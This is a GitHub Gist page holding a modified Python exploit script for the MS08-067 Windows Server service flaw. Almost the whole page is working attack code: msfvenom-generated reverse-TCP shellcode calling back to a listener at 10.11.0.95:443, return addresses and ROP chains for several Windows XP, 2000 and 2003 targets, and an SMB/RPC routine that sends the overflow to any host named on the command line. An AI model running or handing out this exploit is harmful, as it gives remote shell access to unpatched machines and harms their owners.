Last active
October 2, 2018 11:12
-
-
Save AfroThundr3007730/b433f420a792237440c836c06b4b32ab to your computer and use it in GitHub Desktop.
Modified version of the MS08-067 python script found here: https://github.com/ankh2054/python-exploits/blob/master/ms08_067.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct | |
| import time | |
| import sys | |
| from threading import Thread | |
| try: | |
| from impacket import uuid | |
| from impacket.dcerpc.v5 import transport | |
| except ImportError, _: | |
| print '[-] Install the following libraries to make this script work' | |
| print '[-] Impacket : http://oss.coresecurity.com/projects/impacket.html' | |
| print '[-] PyCrypto : http://www.amk.ca/python/code/crypto.html' | |
| sys.exit(1) | |
| print '#######################################################################' | |
| print '# MS08-067 Exploit #' | |
| print '# This is a modified verion of Debasis Mohanty\'s code #' | |
| print '# (https://www.exploit-db.com/exploits/7132/). #' | |
| print '# The return addresses and the ROP parts are ported from metasploit #' | |
| print '# module exploit/windows/smb/ms08_067_netapi #' | |
| print '#######################################################################\n' | |
| # Shellcode - Standard Reverse TCP shellcode | |
| # Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40 | |
| # Payload size: 348 bytes + 62 NOPs (included) | |
| # Make sure you set meterpreter EXITFUNC=thread - Important! | |
| # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 \ | |
| # EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -n 62 | |
| shellcode = ( | |
| "\x49\x3f\xfd\xfc\xfc\x43\xfc\x90\xd6\xfc\x42\x43\x41\x3f\x43\x4a" | |
| "\xfd\xd6\x48\x92\x99\x42\x27\x41\xf8\xfc\x90\xf8\xf5\x91\x9f\xf9" | |
| "\x98\x37\x93\x41\x3f\xf5\x93\x98\xd6\x4b\x48\x3f\x27\x4a\x43\xf5" | |
| "\xfd\x43\xf9\x90\xf9\x98\x90\x4a\x92\x4a\x9f\xfc\x98\x92\x33\xc9" | |
| "\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x9c\x91\x96" | |
| "\xc3\x83\xee\xfc\xe2\xf4\x60\x79\x14\xc3\x9c\x91\xf6\x4a\x79\xa0" | |
| "\x56\xa7\x17\xc1\xa6\x48\xce\x9d\x1d\x91\x88\x1a\xe4\xeb\x93\x26" | |
| "\xdc\xe5\xad\x6e\x3a\xff\xfd\xed\x94\xef\xbc\x50\x59\xce\x9d\x56" | |
| "\x74\x31\xce\xc6\x1d\x91\x8c\x1a\xdc\xff\x17\xdd\x87\xbb\x7f\xd9" | |
| "\x97\x12\xcd\x1a\xcf\xe3\x9d\x42\x1d\x8a\x84\x72\xac\x8a\x17\xa5" | |
| "\x1d\xc2\x4a\xa0\x69\x6f\x5d\x5e\x9b\xc2\x5b\xa9\x76\xb6\x6a\x92" | |
| "\xeb\x3b\xa7\xec\xb2\xb6\x78\xc9\x1d\x9b\xb8\x90\x45\xa5\x17\x9d" | |
| "\xdd\x48\xc4\x8d\x97\x10\x17\x95\x1d\xc2\x4c\x18\xd2\xe7\xb8\xca" | |
| "\xcd\xa2\xc5\xcb\xc7\x3c\x7c\xce\xc9\x99\x17\x83\x7d\x4e\xc1\xf9" | |
| "\xa5\xf1\x9c\x91\xfe\xb4\xef\xa3\xc9\x97\xf4\xdd\xe1\xe5\x9b\x6e" | |
| "\x43\x7b\x0c\x90\x96\xc3\xb5\x55\xc2\x93\xf4\xb8\x16\xa8\x9c\x6e" | |
| "\x43\x93\xcc\xc1\xc6\x83\xcc\xd1\xc6\xab\x76\x9e\x49\x23\x63\x44" | |
| "\x01\xa9\x99\xf9\x9c\xc8\x9c\xce\xfe\xc1\x9c\x90\x2d\x4a\x7a\xfb" | |
| "\x86\x95\xcb\xf9\x0f\x66\xe8\xf0\x69\x16\x19\x51\xe2\xcf\x63\xdf" | |
| "\x9e\xb6\x70\xf9\x66\x76\x3e\xc7\x69\x16\xf4\xf2\xfb\xa7\x9c\x18" | |
| "\x75\x94\xcb\xc6\xa7\x35\xf6\x83\xcf\x95\x7e\x6c\xf0\x04\xd8\xb5" | |
| "\xaa\xc2\x9d\x1c\xd2\xe7\x8c\x57\x96\x87\xc8\xc1\xc0\x95\xca\xd7" | |
| "\xc0\x8d\xca\xc7\xc5\x95\xf4\xe8\x5a\xfc\x1a\x6e\x43\x4a\x7c\xdf" | |
| "\xc0\x85\x63\xa1\xfe\xcb\x1b\x8c\xf6\x3c\x49\x2a\x76\xde\xb6\x9b" | |
| "\xfe\x65\x09\x2c\x0b\x3c\x49\xad\x90\xbf\x96\x11\x6d\x23\xe9\x94" | |
| "\x2d\x84\x8f\xe3\xf9\xa9\x9c\xc2\x69\x16" | |
| ) | |
| nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \ | |
| "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10 | |
| disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \ | |
| 28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62" | |
| ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01" | |
| module_base = 0x6f880000 | |
| def generate_rop(rvas): | |
| gadget1 = "\x90\x5a\x59\xc3" | |
| gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] | |
| gadget3 = "\xcc\x90\xeb\x5a" | |
| ret = struct.pack('<L', 0x00018000) | |
| ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base) | |
| ret += struct.pack('<L', 0x01040110) | |
| ret += struct.pack('<L', 0x01010101) | |
| ret += struct.pack('<L', 0x01010101) | |
| ret += struct.pack('<L', | |
| rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base) | |
| ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base) | |
| ret += gadget1 | |
| ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base) | |
| ret += struct.pack('<L', rvas['jmp eax'] + module_base) | |
| ret += gadget2[0] | |
| ret += gadget2[1] | |
| ret += struct.pack('<L', rvas[ | |
| 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base) | |
| ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base) | |
| ret += gadget2[2] | |
| ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base) | |
| ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base) | |
| ret += struct.pack('<L', rvas['jmp eax'] + module_base) | |
| ret += gadget3 | |
| return ret | |
| class SRVSVC_Exploit(Thread): | |
| def __init__(self, target, os, port=445): | |
| super(SRVSVC_Exploit, self).__init__() | |
| self.__trans = None | |
| self.__dce = None | |
| self.__stub = None | |
| self.__port = port | |
| self.__target = target | |
| self.__os = os | |
| def __DCEPacket(self): | |
| if self.__os == '1': | |
| print '[+] Selecting target: Windows XP SP0/SP1 Universal' | |
| ret = "\x61\x13\x00\x01" | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.__os == '2': | |
| print '[+] Selecting target: Windows 2000 Universal' | |
| ret = "\xb0\x1c\x1f\x00" | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.__os == '3': | |
| print '[+] Selecting target: Windows 2003 SP0 Universal' | |
| ret = "\x9e\x12\x00\x01" # 0x01 00 12 9e | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.__os == '4': | |
| print '[+] Selecting target: Windows 2003 SP1 English' | |
| ret_dec = "\x8c\x56\x90\x7c" # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL | |
| ret_pop = "\xf4\x7c\xa2\x7c" # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL | |
| jmp_esp = "\xd3\xfe\x86\x7c" # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL | |
| disable_nx = "\x13\xe4\x83\x7c" # 0x 7c 83 e4 13 NX disable @NTDLL.DLL | |
| jumper = disableNXjumper % ( | |
| ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2) | |
| elif self.__os == '5': | |
| print '[+] Selecting target: Windows XP SP3 French (NX)' | |
| ret = "\x07\xf8\x5b\x59" # 0x59 5b f8 07 | |
| disable_nx = "\xc2\x17\x5c\x59" # 0x59 5c 17 c2 | |
| # the nonxjmper also work in this case. | |
| jumper = nonxjmper % (disable_nx, ret) | |
| elif self.__os == '6': | |
| print '[+] Selecting target: Windows XP SP3 English (NX)' | |
| ret = "\x07\xf8\x88\x6f" # 0x6f 88 f8 07 | |
| disable_nx = "\xc2\x17\x89\x6f" # 0x6f 89 17 c2 | |
| # the nonxjmper also work in this case. | |
| jumper = nonxjmper % (disable_nx, ret) | |
| elif self.__os == '7': | |
| print '[+] Selecting target: Windows XP SP3 English (AlwaysOn NX)' | |
| rvasets = {'call_HeapCreate': 0x21286, | |
| 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796, | |
| 'pop ecx / ret': 0x2e796 + 6, | |
| 'mov [eax], ecx / ret': 0xd296, | |
| 'jmp eax': 0x19c6f, | |
| 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56, | |
| 'mov [eax+0x10], ecx / ret': 0x10a56 + 6, | |
| 'add eax, 8 / ret': 0x29c64} | |
| # the nonxjmper also work in this case. | |
| jumper = generate_rop(rvasets) + "AB" | |
| else: | |
| print '[-] Not supported OS version' | |
| sys.exit(-1) | |
| print '[+] Initiating connection' | |
| self.__trans = transport.DCERPCTransportFactory( | |
| 'ncacn_np:%s[\\pipe\\browser]' % self.__target) | |
| self.__trans.connect() | |
| print '[+] connected to ncacn_np:%s[\\pipe\\browser]' % self.__target | |
| self.__dce = self.__trans.DCERPC_class(self.__trans) | |
| self.__dce.bind(uuid.uuidtup_to_bin( | |
| ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) | |
| # Change shellcode to your required shellcode | |
| path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + \ | |
| "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \ | |
| "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 | |
| server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" + \ | |
| "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" | |
| prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" | |
| self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \ | |
| path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00" | |
| return | |
| def run(self): | |
| self.__DCEPacket() | |
| self.__dce.call(0x1f, self.__stub) | |
| time.sleep(5) | |
| print '[+] Exploit finish.' | |
| def main(): | |
| try: | |
| RHOST = sys.argv[1] | |
| TARGET = sys.argv[2] if len(sys.argv) > 2 else '6' | |
| except IndexError: | |
| print '[-] Usage: %s <RHOST> <TARGET>\n' % sys.argv[0] | |
| print '[-] Example: %s 192.168.1.10 2' % sys.argv[0] | |
| print '[-]' | |
| print '[-] Available Targets (* = Default):' | |
| print '[-] 1 - Windows XP SP0/SP1 Universal' | |
| print '[-] 2 - Windows 2000 Universal' | |
| print '[-] 3 - Windows 2003 SP0 Universal' | |
| print '[-] 4 - Windows 2003 SP1 English' | |
| print '[-] 5 - Windows XP SP3 French (NX)' | |
| print '[-] * 6 - Windows XP SP3 English (NX)' | |
| print '[-] 7 - Windows XP SP3 English (AlwaysOn NX)' | |
| sys.exit(-1) | |
| current = SRVSVC_Exploit(RHOST, TARGET) | |
| current.start() | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Modified and refactored it a bit. Also fixed Pylint warnings (while ignoring the INFO messages.)